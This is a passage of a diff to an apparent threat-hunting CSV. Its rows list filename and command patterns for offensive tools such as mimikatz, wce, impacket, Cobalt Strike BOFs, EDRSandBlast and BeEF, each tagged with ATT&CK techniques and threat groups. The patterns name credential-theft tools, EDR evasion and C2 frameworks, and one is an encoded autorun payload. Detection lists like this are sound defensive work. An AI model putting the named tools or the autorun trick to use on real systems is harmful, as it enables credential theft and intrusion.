Mustang Panda - Chimera - APT29","C2","https://github.com/vysecurity/ANGRYPUPPY","1","1","N/A","10","10","300","93","2020-04-26T17:35:31Z","2017-07-11T14:18:07Z" -"*-w 
*wordlists*.txt*","offensive_tool_keyword","gobuster","Directory/File DNS and VHost busting tool written in Go","T1595 - T1133 - T1110 - T1027 - T1132 - T1048","TA0010 - TA0001 - TA0006 - TA0005 - TA0011","N/A","N/A","Network Exploitation Tools","https://github.com/OJ/gobuster","1","0","N/A","N/A","10","8199","1120","2023-09-12T22:37:40Z","2014-11-14T13:18:35Z" +"*-w *wordlists*.txt*","offensive_tool_keyword","gobuster","Directory/File DNS and VHost busting tool written in Go","T1595 - T1133 - T1110 - T1027 - T1132 - T1048","TA0010 - TA0001 - TA0006 - TA0005 - TA0011","N/A","N/A","Network Exploitation Tools","https://github.com/OJ/gobuster","1","0","N/A","N/A","10","8203","1120","2023-09-12T22:37:40Z","2014-11-14T13:18:35Z" "*W2F1dG9ydW5dDQpzaGVsbGV4ZWN1dGU9eTMyNHNlZHguZXhlDQppY29uPSVTeXN0ZW1Sb290JVxzeXN0ZW0zMlxTSEVMTDMyLmRsbCw0DQphY3Rpb249T3BlbiBmb2xkZXIgdG8gdmlldyBmaWxlcw0Kc2hlbGxcZGVmYXVsdD1PcGVuDQpzaGVsbFxkZWZhdWx0XGNvbW1hbmQ9eTMyNHNlZHguZXhlDQpzaGVsbD1kZWZhdWx0*","offensive_tool_keyword","EDRaser","EDRaser is a powerful tool for remotely deleting access logs & Windows event logs & databases and other files on remote machines.","T1070.004 - T1027 - T1564.001","TA0005 - TA0040 - TA0003","N/A","N/A","Defense Evasion","https://github.com/SafeBreach-Labs/EDRaser","1","1","N/A","10","2","118","16","2023-09-27T13:45:05Z","2023-08-10T04:30:45Z" "*W2F1dG9ydW5dDQpzaGVsbGV4ZWN1dGU9eTMyNHNlZHguZXhlDQppY29uPSVTeXN0ZW1Sb290JVxzeXN0ZW0zMlxTSEVMTDMyLmRsbCw0DQphY3Rpb249T3BlbiBmb2xkZXIgdG8gdmlldyBmaWxlcw0Kc2hlbGxcZGVmYXVsdD1PcGVuDQpzaGVsbFxkZWZhdWx0XGNvbW1hbmQ9eTMyNHNlZHguZXhlDQpzaGVsbD1kZWZhdWx0*","offensive_tool_keyword","EternalHushFramework","EternalHush Framework is a new open source project that is an advanced C&C framework. 
Designed specifically for Windows operating systems","T1071.001 - T1132.001 - T1059.003 - T1547.001","TA0011 - TA0005 - TA0010 - TA0002","N/A","N/A","C2","https://github.com/APT64/EternalHushFramework","1","0","N/A","10","10","140","21","2023-09-21T19:04:41Z","2023-07-09T09:13:21Z" -"*w32-speaking-shellcode.asm*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*w32-speaking-shellcode.bin*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*w32-speaking-shellcode-eaf.bin*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" +"*w32-speaking-shellcode.asm*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. 
and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*w32-speaking-shellcode.bin*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*w32-speaking-shellcode-eaf.bin*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. 
It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" "*w3af_gui*","offensive_tool_keyword","w3af","w3af is a Web Application Attack and Audit Framework. The projects goal is to create a framework to help you secure your web applications by finding and exploiting all web application vulnerabilities.","T1190 - T1211 - T1220 - T1222 - T1247 - T1592","TA0001 - TA0002 - TA0003 - TA0007 - TA0011","N/A","N/A","Vulnerability scanner","https://w3af.org/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*WAF-bypass-Cheat-Sheet*","offensive_tool_keyword","WAF-bypass-Cheat-Sheet","WAF/IPS/DLP bypass Cheat Sheet","T1210 - T1204 - T1061 - T1133 - T1190","TA0001 - TA0002 - TA0003","N/A","N/A","Defense Evasion","https://github.com/Bo0oM/WAF-bypass-Cheat-Sheet","1","1","N/A","N/A","5","408","64","2018-11-28T20:34:17Z","2018-11-28T19:34:02Z" "*wafw00f https://*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation 
tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" -"*wafw00f*","offensive_tool_keyword","wafw00f","To do its magic. WAFW00F does the following Sends a normal HTTP request and analyses the response. this identifies a number of WAF solutions. If that is not successful. it sends a number of (potentially malicious) HTTP requests and uses simple logic to deduce which WAF it is. If that is also not successful. it analyses the responses previously returned and uses another simple algorithm to guess if a WAF or security solution is actively responding to our attacks.","T1210.001 - T1190 - T1589","TA0007 - TA0002 - TA0008","N/A","N/A","Defense Evasion","https://github.com/EnableSecurity/wafw00f","1","1","N/A","N/A","10","4470","882","2023-06-28T09:24:59Z","2014-05-14T17:08:16Z" -"*wapiti -u*","offensive_tool_keyword","wapiti","Web vulnerability scanner written in Python3","T1592 - T1592.003","TA0007 - TA0040","N/A","N/A","Web Attacks","https://github.com/wapiti-scanner/wapiti","1","0","N/A","N/A","8","785","132","2023-09-27T07:26:22Z","2020-06-06T20:17:55Z" -"*wapiti.git*","offensive_tool_keyword","wapiti","Web vulnerability scanner written in Python3","T1592 - T1592.003","TA0007 - TA0040","N/A","N/A","Web Attacks","https://github.com/wapiti-scanner/wapiti","1","1","N/A","N/A","8","785","132","2023-09-27T07:26:22Z","2020-06-06T20:17:55Z" -"*wapiti.py*","offensive_tool_keyword","wapiti","Web vulnerability scanner written in Python3","T1592 - T1592.003","TA0007 - TA0040","N/A","N/A","Web Attacks","https://github.com/wapiti-scanner/wapiti","1","1","N/A","N/A","8","785","132","2023-09-27T07:26:22Z","2020-06-06T20:17:55Z" -"*wapiti3-*.tar.gz*","offensive_tool_keyword","wapiti","Web vulnerability scanner written in Python3","T1592 - T1592.003","TA0007 - TA0040","N/A","N/A","Web 
Attacks","https://github.com/wapiti-scanner/wapiti","1","1","N/A","N/A","8","785","132","2023-09-27T07:26:22Z","2020-06-06T20:17:55Z" -"*wapiti3-*-any.whl*","offensive_tool_keyword","wapiti","Web vulnerability scanner written in Python3","T1592 - T1592.003","TA0007 - TA0040","N/A","N/A","Web Attacks","https://github.com/wapiti-scanner/wapiti","1","1","N/A","N/A","8","785","132","2023-09-27T07:26:22Z","2020-06-06T20:17:55Z" -"*wapiti3/bin*","offensive_tool_keyword","wapiti","Web vulnerability scanner written in Python3","T1592 - T1592.003","TA0007 - TA0040","N/A","N/A","Web Attacks","https://github.com/wapiti-scanner/wapiti","1","1","N/A","N/A","8","785","132","2023-09-27T07:26:22Z","2020-06-06T20:17:55Z" -"*wapiti-getcookie*","offensive_tool_keyword","wapiti","Web vulnerability scanner written in Python3","T1592 - T1592.003","TA0007 - TA0040","N/A","N/A","Web Attacks","https://github.com/wapiti-scanner/wapiti","1","1","N/A","N/A","8","785","132","2023-09-27T07:26:22Z","2020-06-06T20:17:55Z" -"*wappalyzer.py*","offensive_tool_keyword","wapiti","Web vulnerability scanner written in Python3","T1592 - T1592.003","TA0007 - TA0040","N/A","N/A","Web Attacks","https://github.com/wapiti-scanner/wapiti","1","1","N/A","N/A","8","785","132","2023-09-27T07:26:22Z","2020-06-06T20:17:55Z" +"*wafw00f*","offensive_tool_keyword","wafw00f","To do its magic. WAFW00F does the following Sends a normal HTTP request and analyses the response. this identifies a number of WAF solutions. If that is not successful. it sends a number of (potentially malicious) HTTP requests and uses simple logic to deduce which WAF it is. If that is also not successful. 
it analyses the responses previously returned and uses another simple algorithm to guess if a WAF or security solution is actively responding to our attacks.","T1210.001 - T1190 - T1589","TA0007 - TA0002 - TA0008","N/A","N/A","Defense Evasion","https://github.com/EnableSecurity/wafw00f","1","1","N/A","N/A","10","4472","883","2023-06-28T09:24:59Z","2014-05-14T17:08:16Z" +"*wapiti -u*","offensive_tool_keyword","wapiti","Web vulnerability scanner written in Python3","T1592 - T1592.003","TA0007 - TA0040","N/A","N/A","Web Attacks","https://github.com/wapiti-scanner/wapiti","1","0","N/A","N/A","8","785","132","2023-10-04T14:09:48Z","2020-06-06T20:17:55Z" +"*wapiti.git*","offensive_tool_keyword","wapiti","Web vulnerability scanner written in Python3","T1592 - T1592.003","TA0007 - TA0040","N/A","N/A","Web Attacks","https://github.com/wapiti-scanner/wapiti","1","1","N/A","N/A","8","785","132","2023-10-04T14:09:48Z","2020-06-06T20:17:55Z" +"*wapiti.py*","offensive_tool_keyword","wapiti","Web vulnerability scanner written in Python3","T1592 - T1592.003","TA0007 - TA0040","N/A","N/A","Web Attacks","https://github.com/wapiti-scanner/wapiti","1","1","N/A","N/A","8","785","132","2023-10-04T14:09:48Z","2020-06-06T20:17:55Z" +"*wapiti3-*.tar.gz*","offensive_tool_keyword","wapiti","Web vulnerability scanner written in Python3","T1592 - T1592.003","TA0007 - TA0040","N/A","N/A","Web Attacks","https://github.com/wapiti-scanner/wapiti","1","1","N/A","N/A","8","785","132","2023-10-04T14:09:48Z","2020-06-06T20:17:55Z" +"*wapiti3-*-any.whl*","offensive_tool_keyword","wapiti","Web vulnerability scanner written in Python3","T1592 - T1592.003","TA0007 - TA0040","N/A","N/A","Web Attacks","https://github.com/wapiti-scanner/wapiti","1","1","N/A","N/A","8","785","132","2023-10-04T14:09:48Z","2020-06-06T20:17:55Z" +"*wapiti3/bin*","offensive_tool_keyword","wapiti","Web vulnerability scanner written in Python3","T1592 - T1592.003","TA0007 - TA0040","N/A","N/A","Web 
Attacks","https://github.com/wapiti-scanner/wapiti","1","1","N/A","N/A","8","785","132","2023-10-04T14:09:48Z","2020-06-06T20:17:55Z" +"*wapiti-getcookie*","offensive_tool_keyword","wapiti","Web vulnerability scanner written in Python3","T1592 - T1592.003","TA0007 - TA0040","N/A","N/A","Web Attacks","https://github.com/wapiti-scanner/wapiti","1","1","N/A","N/A","8","785","132","2023-10-04T14:09:48Z","2020-06-06T20:17:55Z" +"*wappalyzer.py*","offensive_tool_keyword","wapiti","Web vulnerability scanner written in Python3","T1592 - T1592.003","TA0007 - TA0040","N/A","N/A","Web Attacks","https://github.com/wapiti-scanner/wapiti","1","1","N/A","N/A","8","785","132","2023-10-04T14:09:48Z","2020-06-06T20:17:55Z" "*warberry*","offensive_tool_keyword","warberry","WarBerryPi is a RaspberryPi based hardware implant that has the ability to go on stealth mode when used in acuiring informational data from a target network. especially useful during read teaming engagements. Its designed with a special feature that allows it to get the needed information within the shortest time possible. WarBerryPis scripts are designed in such way to avoid noise in the network as much as possible.","T1589 - T1539 - T1562","TA0002 - TA0003 - TA0007","N/A","N/A","Exploitation tools","https://github.com/secgroundzero/warberry","1","1","N/A","N/A","10","2209","307","2019-11-09T00:09:44Z","2016-05-10T16:25:03Z" -"*warpzoneclient.cpp*","offensive_tool_keyword","elevationstation","elevate to SYSTEM any way we can! Metasploit and PSEXEC getsystem alternative","T1548.002 - T1055 - T1574.002 - T1078.003","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/g3tsyst3m/elevationstation","1","1","N/A","N/A","3","271","33","2023-08-17T02:45:17Z","2023-06-10T03:30:59Z" -"*warpzoneclient.exe*","offensive_tool_keyword","elevationstation","elevate to SYSTEM any way we can! 
Metasploit and PSEXEC getsystem alternative","T1548.002 - T1055 - T1574.002 - T1078.003","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/g3tsyst3m/elevationstation","1","1","N/A","N/A","3","271","33","2023-08-17T02:45:17Z","2023-06-10T03:30:59Z" -"*warpzoneclient.exe*","offensive_tool_keyword","elevationstation","elevate to SYSTEM any way we can! Metasploit and PSEXEC getsystem alternative","T1548.002 - T1055 - T1574.002 - T1078.003","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/g3tsyst3m/elevationstation","1","1","N/A","N/A","3","271","33","2023-08-17T02:45:17Z","2023-06-10T03:30:59Z" -"*warpzoneclient.sln*","offensive_tool_keyword","elevationstation","elevate to SYSTEM any way we can! Metasploit and PSEXEC getsystem alternative","T1548.002 - T1055 - T1574.002 - T1078.003","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/g3tsyst3m/elevationstation","1","1","N/A","N/A","3","271","33","2023-08-17T02:45:17Z","2023-06-10T03:30:59Z" -"*warpzoneclient.vcxproj*","offensive_tool_keyword","elevationstation","elevate to SYSTEM any way we can! Metasploit and PSEXEC getsystem alternative","T1548.002 - T1055 - T1574.002 - T1078.003","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/g3tsyst3m/elevationstation","1","1","N/A","N/A","3","271","33","2023-08-17T02:45:17Z","2023-06-10T03:30:59Z" +"*warpzoneclient.cpp*","offensive_tool_keyword","elevationstation","elevate to SYSTEM any way we can! Metasploit and PSEXEC getsystem alternative","T1548.002 - T1055 - T1574.002 - T1078.003","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/g3tsyst3m/elevationstation","1","1","N/A","N/A","3","272","33","2023-08-17T02:45:17Z","2023-06-10T03:30:59Z" +"*warpzoneclient.exe*","offensive_tool_keyword","elevationstation","elevate to SYSTEM any way we can! 
Metasploit and PSEXEC getsystem alternative","T1548.002 - T1055 - T1574.002 - T1078.003","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/g3tsyst3m/elevationstation","1","1","N/A","N/A","3","272","33","2023-08-17T02:45:17Z","2023-06-10T03:30:59Z" +"*warpzoneclient.exe*","offensive_tool_keyword","elevationstation","elevate to SYSTEM any way we can! Metasploit and PSEXEC getsystem alternative","T1548.002 - T1055 - T1574.002 - T1078.003","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/g3tsyst3m/elevationstation","1","1","N/A","N/A","3","272","33","2023-08-17T02:45:17Z","2023-06-10T03:30:59Z" +"*warpzoneclient.sln*","offensive_tool_keyword","elevationstation","elevate to SYSTEM any way we can! Metasploit and PSEXEC getsystem alternative","T1548.002 - T1055 - T1574.002 - T1078.003","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/g3tsyst3m/elevationstation","1","1","N/A","N/A","3","272","33","2023-08-17T02:45:17Z","2023-06-10T03:30:59Z" +"*warpzoneclient.vcxproj*","offensive_tool_keyword","elevationstation","elevate to SYSTEM any way we can! 
Metasploit and PSEXEC getsystem alternative","T1548.002 - T1055 - T1574.002 - T1078.003","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/g3tsyst3m/elevationstation","1","1","N/A","N/A","3","272","33","2023-08-17T02:45:17Z","2023-06-10T03:30:59Z"
 "*wavestone-cdt/EDRSandblast*","offensive_tool_keyword","EDRSandBlast","EDRSandBlast is a tool written in C that weaponize a vulnerable signed driver to bypass EDR detections","T1547.002 - T1055.001 - T1205","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/wavestone-cdt/EDRSandblast","1","1","N/A","10","10","1117","224","2023-09-22T14:18:21Z","2021-11-02T15:02:42Z"
 "*wavvs/nanorobeus*","offensive_tool_keyword","nanorobeus","COFF file (BOF) for managing Kerberos tickets.","T1558.003 - T1208","TA0006 - TA0007","N/A","N/A","C2","https://github.com/wavvs/nanorobeus","1","1","N/A","10","10","234","28","2023-07-02T12:56:27Z","2022-07-04T00:33:30Z"
-"*waza1234*","offensive_tool_keyword","mimikatz","mimikatz exploitation default password","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Credential Access","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17798","3445","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z"
+"*waza1234*","offensive_tool_keyword","mimikatz","mimikatz exploitation default password","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Credential Access","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z"
 "*WazeHell/sam-the-admin*","offensive_tool_keyword","POC","POC exploitation for CVE-2021-42278 and CVE-2021-42287 to impersonate DA from standard domain user","T1548 - T1134 - T1078.002 - T1078","TA0003 - TA0008 - TA0002","N/A","N/A","Exploitation tools","https://github.com/WazeHell/sam-the-admin/tree/main/utils","1","1","N/A","N/A","10","929","190","2022-07-10T22:23:13Z","2021-12-11T15:10:30Z"
 "*wce -i 3e5 -s *","offensive_tool_keyword","wce","Windows Credentials Editor","T1003.002 - T1003.003 - T1558.001 - T1558.003 - T1110 - T1055.001","TA0006 - TA0005 - TA0002","N/A","N/A","Credential Access","https://www.kali.org/tools/wce/","1","0","N/A","8","4","N/A","N/A","N/A","N/A"
 "*wce*getlsasrvaddr.exe*","offensive_tool_keyword","wce","Windows Credentials Editor","T1003.002 - T1003.003 - T1558.001 - T1558.003 - T1110 - T1055.001","TA0006 - TA0005 - TA0002","N/A","N/A","Credential Access","https://www.kali.org/tools/wce/","1","1","N/A","8","4","N/A","N/A","N/A","N/A"
 "*wce-master.zip*","offensive_tool_keyword","wce","Windows Credentials Editor","T1003.002 - T1003.003 - T1558.001 - T1558.003 - T1110 - T1055.001","TA0006 - TA0005 - TA0002","N/A","N/A","Credential Access","https://www.kali.org/tools/wce/","1","1","N/A","8","4","N/A","N/A","N/A","N/A"
 "*wce-universal.exe*","offensive_tool_keyword","wce","Windows Credentials Editor","T1003.002 - T1003.003 - T1558.001 - T1558.003 - T1110 - T1055.001","TA0006 - TA0005 - TA0002","N/A","N/A","Credential Access","https://www.kali.org/tools/wce/","1","1","N/A","8","4","N/A","N/A","N/A","N/A"
 "*wcfrelayserver.py*","offensive_tool_keyword","cobaltstrike","Beacon Object File (BOF) to obtain a usable TGT for the current user and does not require elevated privileges on the host","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/connormcgarr/tgtdelegation","1","1","N/A","10","10","128","21","2021-11-26T16:45:05Z","2021-11-22T18:42:57Z"
-"*wcfrelayserver.py*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11786","3291","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z"
-"*WCMCredentials.txt*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2960","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z"
+"*wcfrelayserver.py*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z"
+"*WCMCredentials.txt*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z"
 "*wdextract *:\*\*.vdm*","offensive_tool_keyword","WDExtract","Extract Windows Defender database from vdm files and unpack it","T1059 - T1005 - T1119","TA0002 - TA0009 - TA0003","N/A","N/A","Defense Evasion","https://github.com/hfiref0x/WDExtract/","1","0","N/A","8","4","347","56","2020-02-10T06:53:43Z","2019-04-19T17:33:48Z"
 "*wdextract *\mrt.exe*","offensive_tool_keyword","WDExtract","Extract Windows Defender database from vdm files and unpack it","T1059 - T1005 - T1119","TA0002 - TA0009 - TA0003","N/A","N/A","Defense Evasion","https://github.com/hfiref0x/WDExtract/","1","0","N/A","8","4","347","56","2020-02-10T06:53:43Z","2019-04-19T17:33:48Z"
 "*WDExtract-master*","offensive_tool_keyword","WDExtract","Extract Windows Defender database from vdm files and unpack it","T1059 - T1005 - T1119","TA0002 - TA0009 - TA0003","N/A","N/A","Defense Evasion","https://github.com/hfiref0x/WDExtract/","1","1","N/A","8","4","347","56","2020-02-10T06:53:43Z","2019-04-19T17:33:48Z"
@@ -18147,10 +18333,10 @@
 "*weakpass.com/generate*","offensive_tool_keyword","weakpass","Weakpass collection of tools for bruteforce and hashcracking","T1110 - T1201","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/zzzteph/weakpass","1","1","N/A","10","3","293","36","2023-03-17T22:45:29Z","2021-08-29T13:07:37Z"
 "*weakpass/crack-js*","offensive_tool_keyword","weakpass","Weakpass collection of tools for bruteforce and hashcracking","T1110 - T1201","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/zzzteph/weakpass","1","1","N/A","10","3","293","36","2023-03-17T22:45:29Z","2021-08-29T13:07:37Z"
 "*weakpass-main.*","offensive_tool_keyword","weakpass","Weakpass collection of tools for bruteforce and hashcracking","T1110 - T1201","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/zzzteph/weakpass","1","1","N/A","10","3","293","36","2023-03-17T22:45:29Z","2021-08-29T13:07:37Z"
-"*web_cloner/interceptor*","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","8794","2027","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z"
+"*web_cloner/interceptor*","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","8796","2026","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z"
 "*WebBrowserPassView.exe*","offensive_tool_keyword","webBrowserPassView","WebBrowserPassView is a password recovery tool that reveals the passwords stored by the following Web browsers: Internet Explorer (Version 4.0 - 11.0). Mozilla Firefox (All Versions). Google Chrome. Safari. and Opera. This tool can be used to recover your lost/forgotten password of any Website. including popular Web sites. like Facebook. Yahoo. Google. and GMail. as long as the password is stored by your Web Browser.","T1003 - T1021 - T1056 - T1110 - T1212 - T1552","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0011","N/A","N/A","Credential Access","https://www.nirsoft.net/utils/web_browser_password.html","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
